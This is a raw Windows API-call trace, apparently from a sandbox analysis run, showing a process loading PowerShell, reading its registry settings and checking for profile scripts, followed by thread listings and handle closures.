	[0491.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.963] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0491.964] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.964] CoTaskMemFree (pv=0x252be0) 
	[0491.970] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0491.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.970] CoTaskMemFree (pv=0x252be0) 
	[0491.971] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0491.971] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.971] CoTaskMemFree (pv=0x252be0) 
	[0491.971] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0491.971] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.972] CoTaskMemFree (pv=0x252be0) 
	[0491.973] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0491.973] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.973] CoTaskMemFree (pv=0x252be0) 
	[0491.976] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0491.976] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.977] CoTaskMemFree (pv=0x252be0) 
	[0491.977] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0491.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.977] CoTaskMemFree (pv=0x252be0) 
	[0494.624] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0494.625] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0494.625] CoTaskMemFree (pv=0x252be0) 
	[0495.486] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x253020
	[0495.488] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x253130
	[0499.812] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0499.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0499.812] CoTaskMemFree (pv=0x253240) 
	[0499.815] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0499.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0499.816] CoTaskMemFree (pv=0x253240) 
	[0500.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0500.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0500.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0500.487] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0500.493] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d8f8 | out: phkResult=0x16d8f8*=0x2f4) returned 0x0
	[0500.493] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d87c, lpData=0x0, lpcbData=0x16d878*=0x0 | out: lpType=0x16d87c*=0x1, lpData=0x0, lpcbData=0x16d878*=0x56) returned 0x0
	[0500.493] CoTaskMemAlloc (cb=0x5a) returned 0x1b837310
	[0500.493] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d84c, lpData=0x1b837310, lpcbData=0x16d848*=0x56 | out: lpType=0x16d84c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d848*=0x56) returned 0x0
	[0500.493] CoTaskMemFree (pv=0x1b837310) 
	[0500.493] RegCloseKey (hKey=0x2f4) returned 0x0
	[0500.493] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d8f8 | out: phkResult=0x16d8f8*=0x2f4) returned 0x0
	[0500.493] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d87c, lpData=0x0, lpcbData=0x16d878*=0x0 | out: lpType=0x16d87c*=0x1, lpData=0x0, lpcbData=0x16d878*=0x56) returned 0x0
	[0500.494] CoTaskMemAlloc (cb=0x5a) returned 0x1b837310
	[0500.494] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d84c, lpData=0x1b837310, lpcbData=0x16d848*=0x56 | out: lpType=0x16d84c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d848*=0x56) returned 0x0
	[0500.494] CoTaskMemFree (pv=0x1b837310) 
	[0500.494] RegCloseKey (hKey=0x2f4) returned 0x0
	[0500.495] CoTaskMemAlloc (cb=0x20c) returned 0x1b806300
	[0500.496] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b806300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0500.497] CoTaskMemFree (pv=0x1b806300) 
	[0500.497] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0500.497] CoTaskMemAlloc (cb=0x20c) returned 0x1b806300
	[0500.497] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b806300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0500.497] CoTaskMemFree (pv=0x1b806300) 
	[0500.497] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0500.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0500.498] SetErrorMode (uMode=0x1) returned 0x1
	[0500.498] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d860 | out: lpFileInformation=0x16d860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0500.498] SetErrorMode (uMode=0x1) returned 0x1
	[0500.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0500.499] SetErrorMode (uMode=0x1) returned 0x1
	[0500.499] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d860 | out: lpFileInformation=0x16d860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0500.499] SetErrorMode (uMode=0x1) returned 0x1
	[0500.499] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0500.499] SetErrorMode (uMode=0x1) returned 0x1
	[0500.499] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d860 | out: lpFileInformation=0x16d860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0500.499] SetErrorMode (uMode=0x1) returned 0x1
	[0500.499] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0500.500] SetErrorMode (uMode=0x1) returned 0x1
	[0500.500] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d860 | out: lpFileInformation=0x16d860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0500.500] SetErrorMode (uMode=0x1) returned 0x1
	[0500.500] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0500.500] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0500.500] CoTaskMemFree (pv=0x253240) 
	[0500.501] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0500.501] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0500.501] CoTaskMemFree (pv=0x253240) 
	[0500.501] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0500.501] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0500.501] CoTaskMemFree (pv=0x253240) 
	[0500.502] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0500.502] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0500.502] CoTaskMemFree (pv=0x253240) 
	[0500.503] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0500.503] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0500.503] CoTaskMemFree (pv=0x253240) 
	[0500.504] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0500.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0500.504] CoTaskMemFree (pv=0x253240) 
	[0500.505] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0500.506] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x16da40 | out: lpMode=0x16da40) returned 1
	[0500.507] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0500.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0500.507] CoTaskMemFree (pv=0x253240) 
	[0500.510] SetEvent (hEvent=0x1dc) returned 1
	[0500.510] SetEvent (hEvent=0x330) returned 1
	[0500.510] SetEvent (hEvent=0x31c) returned 1
	[0500.511] SetEvent (hEvent=0x1e0) returned 1
	[0500.512] CoTaskMemAlloc (cb=0x104) returned 0x253240
	[0500.512] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x253240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0500.512] CoTaskMemFree (pv=0x253240) 
	[0500.513] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d798 | out: phkResult=0x16d798*=0x370) returned 0x0
	[0500.513] RegQueryValueExW (in: hKey=0x370, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x16d71c, lpData=0x0, lpcbData=0x16d718*=0x0 | out: lpType=0x16d71c*=0x0, lpData=0x0, lpcbData=0x16d718*=0x0) returned 0x2

Thread:
	id = 346
	os_tid = 0x990


Thread:
	id = 348
	os_tid = 0x8f4


Thread:
	id = 685
	os_tid = 0x156c


Thread:
	id = 687
	os_tid = 0x15a4


Thread:
	id = 693
	os_tid = 0x15c0


Thread:
	id = 726
	os_tid = 0x1654


Thread:
	id = 728
	os_tid = 0x1660

	[0439.219] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0467.838] LocalFree (hMem=0x1c7340) returned 0x0
	[0467.838] CloseHandle (hObject=0x330) returned 1
	[0467.839] CloseHandle (hObject=0x13) returned 1
	[0467.839] CloseHandle (hObject=0xf) returned 1
	[0467.840] RegCloseKey (hKey=0x31c) returned 0x0
	[0467.840] RegCloseKey (hKey=0x318) returned 0x0
	[0467.840] RegCloseKey (hKey=0x314) returned 0x0
	[0467.840] LocalFree (hMem=0x1c7310) returned 0x0
	[0467.840] RegCloseKey (hKey=0x338) returned 0x0
	[0473.707] RegCloseKey (hKey=0x338) returned 0x0
	[0483.005] RegCloseKey (hKey=0x338) returned 0x0
	[0483.006] RegCloseKey (hKey=0x314) returned 0x0
	[0493.714] RegCloseKey (hKey=0x3a0) returned 0x0
	[0493.714] RegCloseKey (hKey=0x39c) returned 0x0
	[0493.714] RegCloseKey (hKey=0x378) returned 0x0
	[0493.714] RegCloseKey (hKey=0x3b4) returned 0x0
	[0493.715] RegCloseKey (hKey=0x394) returned 0x0
	[0493.716] RegCloseKey (hKey=0x390) returned 0x0
	[0493.716] RegCloseKey (hKey=0x38c) returned 0x0
	[0493.716] RegCloseKey (hKey=0x388) returned 0x0
	[0493.716] RegCloseKey (hKey=0x384) returned 0x0
	[0493.717] RegCloseKey (hKey=0x380) returned 0x0
	[0493.717] RegCloseKey (hKey=0x37c) returned 0x0
	[0493.717] RegCloseKey (hKey=0x354) returned 0x0
	[0493.718] RegCloseKey (hKey=0x3b0) returned 0x0
	[0493.718] RegCloseKey (hKey=0x3ac) returned 0x0
	[0493.718] RegCloseKey (hKey=0x374) returned 0x0
	[0493.718] RegCloseKey (hKey=0x370) returned 0x0
	[0493.719] RegCloseKey (hKey=0x36c) returned 0x0
	[0493.719] RegCloseKey (hKey=0x368) returned 0x0
	[0493.719] RegCloseKey (hKey=0x364) returned 0x0
	[0493.720] RegCloseKey (hKey=0x360) returned 0x0
	[0493.720] RegCloseKey (hKey=0x35c) returned 0x0
	[0493.720] RegCloseKey (hKey=0x358) returned 0x0
	[0493.720] RegCloseKey (hKey=0x3a8) returned 0x0
	[0493.721] RegCloseKey (hKey=0x348) returned 0x0
	[0493.721] RegCloseKey (hKey=0x344) returned 0x0
	[0493.721] RegCloseKey (hKey=0x1dc) returned 0x0
	[0493.722] RegCloseKey (hKey=0x1e0) returned 0x0
	[0493.722] RegCloseKey (hKey=0x330) returned 0x0
	[0493.722] RegCloseKey (hKey=0x31c) returned 0x0
	[0493.722] RegCloseKey (hKey=0x318) returned 0x0
	[0493.723] RegCloseKey (hKey=0x338) returned 0x0
	[0493.723] RegCloseKey (hKey=0x3a4) returned 0x0
	[0524.239] RegCloseKey (hKey=0x370) returned 0x0
	[0642.481] CloseHandle (hObject=0x340) returned 1
	[0642.482] CloseHandle (hObject=0x380) returned 1
	[0642.482] CloseHandle (hObject=0x318) returned 1
	[0642.482] CloseHandle (hObject=0x33c) returned 1
	[0642.483] CloseHandle (hObject=0x370) returned 1
	[0642.483] CloseHandle (hObject=0x338) returned 1
	[0700.840] CloseHandle (hObject=0x340) returned 1
	[0700.842] CloseHandle (hObject=0x380) returned 1
	[0700.843] CloseHandle (hObject=0x384) returned 1
	[0700.845] CloseHandle (hObject=0x318) returned 1
	[0700.846] CloseHandle (hObject=0x388) returned 1
	[0700.846] CloseHandle (hObject=0x338) returned 1
	[0783.624] CloseHandle (hObject=0x42c) returned 1
